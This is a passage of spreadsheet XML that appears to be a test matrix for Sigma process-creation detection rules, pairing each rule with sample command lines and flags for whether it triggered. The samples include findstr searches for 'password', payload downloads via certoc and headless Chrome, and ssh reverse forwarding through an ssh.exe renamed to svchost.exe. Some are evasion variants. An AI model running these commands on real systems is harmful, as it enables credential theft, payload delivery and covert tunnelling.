          <t>proc_creation_win_mstsc_run_local_rdp_file_susp_location</t>
        </is>
      </c>
      <c r="C411" s="44" t="inlineStr">
        <is>
          <t>Suspicious Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D411" s="44" t="inlineStr">
        <is>
          <t>6e22722b-dfb1-4508-a911-49ac840b40f8</t>
        </is>
      </c>
      <c r="E411" s="44" t="inlineStr">
        <is>
          <t>mstsc.exe "C:\Users\Public\connection.rdp"</t>
        </is>
      </c>
      <c r="F411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K411" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="n"/>
      <c r="B412" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file_susp_location</t>
        </is>
      </c>
      <c r="C412" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D412" s="43" t="inlineStr">
        <is>
          <t>6e22722b-dfb1-4508-a911-49ac840b40f8</t>
        </is>
      </c>
      <c r="E412" s="43" t="inlineStr">
        <is>
          <t>mstsc.exe C:\Windows\Temp\payload.rdp /f</t>
        </is>
      </c>
      <c r="F412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I412" s="43" t="n"/>
      <c r="J412" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K412" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="n"/>
      <c r="B413" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C413" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D413" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E413" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start remote.exe -arg1 -arg2</t>
        </is>
      </c>
      <c r="F413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H413" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I413" s="43" t="n"/>
      <c r="J413" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K413" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="n"/>
      <c r="B414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C414" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D414" s="44" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E414" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F414" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G414" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H414" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I414" s="43" t="n"/>
      <c r="J414" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K414" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C415" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D415" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E415" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\temp\svchost_browser.exe" &amp;&amp; "C:\temp\svchost_browser.exe" --headless https://example.com</t>
        </is>
      </c>
      <c r="F415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I415" s="43" t="n"/>
      <c r="J415" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K415" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C416" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D416" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E416" s="44" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951); Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951)</t>
        </is>
      </c>
      <c r="J416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C417" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D417" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E417" s="44" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="43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417" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K417" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C418" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D418" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E418" s="44" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I418" s="44" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951); Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J418" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C419" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D419" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E419" s="44" t="inlineStr">
        <is>
          <t>net user guest /expIreS:neVer</t>
        </is>
      </c>
      <c r="F419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I419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419" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K419" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C420" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D420" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E420" s="44" t="inlineStr">
        <is>
          <t>net user guest /ExPirEs:NEver</t>
        </is>
      </c>
      <c r="F420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="44" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951); Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951)</t>
        </is>
      </c>
      <c r="J420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="43" t="n"/>
      <c r="B421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C421" s="44" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D421" s="44" t="inlineStr">
        <is>
          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E421" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Temp\sysupdate.exe &amp;&amp; C:\Temp\sysupdate.exe --headless --dump-dom http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F421" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G421" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H421" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I421" s="43" t="n"/>
      <c r="J421" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K421" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="43" t="n"/>
      <c r="B422" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C422" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D422" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E422" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F422" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G422" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H422" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I422" s="43" t="n"/>
      <c r="J422" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K422" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="43" t="n"/>
      <c r="B423" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C423" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D423" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E423" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I423" s="43" t="n"/>
      <c r="J423" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K423" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="43" t="n"/>
      <c r="B424" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C424" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D424" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E424" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F424" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G424" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H424" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I424" s="43" t="n"/>
      <c r="J424" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K424" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="43" t="n"/>
      <c r="B425" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C425" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D425" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E425" s="43" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F425" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G425" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H425" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I425" s="43" t="n"/>
      <c r="J425" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K425" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="43" t="n"/>
      <c r="B426" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C426" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D426" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E426" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F426" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G426" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I426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426" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K426" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="n"/>
      <c r="B427" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C427" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D427" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E427" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F427" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G427" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I427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427" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K427" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="n"/>
      <c r="B428" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C428" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D428" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E428" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F428" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G428" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I428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428" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K428" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="43" t="n"/>
      <c r="B429" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C429" s="43" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D429" s="43" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E429" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F429" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G429" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I429" s="43" t="inlineStr">
        <is>
          <t>System File Execution Location Anomaly (e4a6b256-3e47-40fc-89d2-7a477edd6915); Suspicious Process Masquerading As SvcHost.EXE (be58d2e2-06c8-4f58-b666-b99f6dc3b6cd); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J429" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K429" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B430" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C430" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D430" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E430" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| findstr /m .</t>
        </is>
      </c>
      <c r="F430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I430" s="43" t="n"/>
      <c r="J430" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K430" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B431" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C431" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D431" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E431" s="43" t="inlineStr">
        <is>
          <t>findstr /s/i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F431" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G431" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H431" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I431" s="43" t="n"/>
      <c r="J431" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K431" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B432" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C432" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D432" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E432" s="43" t="inlineStr">
        <is>
          <t>findstr -s -i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F432" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G432" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H432" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I432" s="43" t="n"/>
      <c r="J432" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K432" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B433" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C433" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D433" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E433" s="43" t="inlineStr">
        <is>
          <t>findstr -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F433" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G433" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H433" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I433" s="43" t="n"/>
      <c r="J433" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K433" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B434" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C434" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D434" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E434" s="43" t="inlineStr">
        <is>
          <t>findstr /S /I "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F434" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G434" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H434" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I434" s="43" t="n"/>
      <c r="J434" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K434" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B435" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C435" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D435" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E435" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F435" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G435" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H435" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I435" s="43" t="n"/>
      <c r="J435" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K435" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B436" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C436" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D436" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E436" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -GetCACAPS http://192.168.1.100/payload.ext</t>
        </is>
      </c>
      <c r="F436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I436" s="43" t="n"/>
      <c r="J436" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K436" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B437" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C437" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D437" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E437" s="43" t="inlineStr">
        <is>
          <t>certoc.exe /GetCACAPS http://192.168.1.100/payload.ext</t>
        </is>
      </c>
      <c r="F437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I437" s="43" t="n"/>
      <c r="J437" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K437" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B438" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C438" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D438" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E438" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -GetCACAPS "http://192.168.1.100/payload.ext"</t>
        </is>
      </c>
      <c r="F438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I438" s="43" t="n"/>
      <c r="J438" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K438" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B439" s="43" t="inlineStr">
        <is>
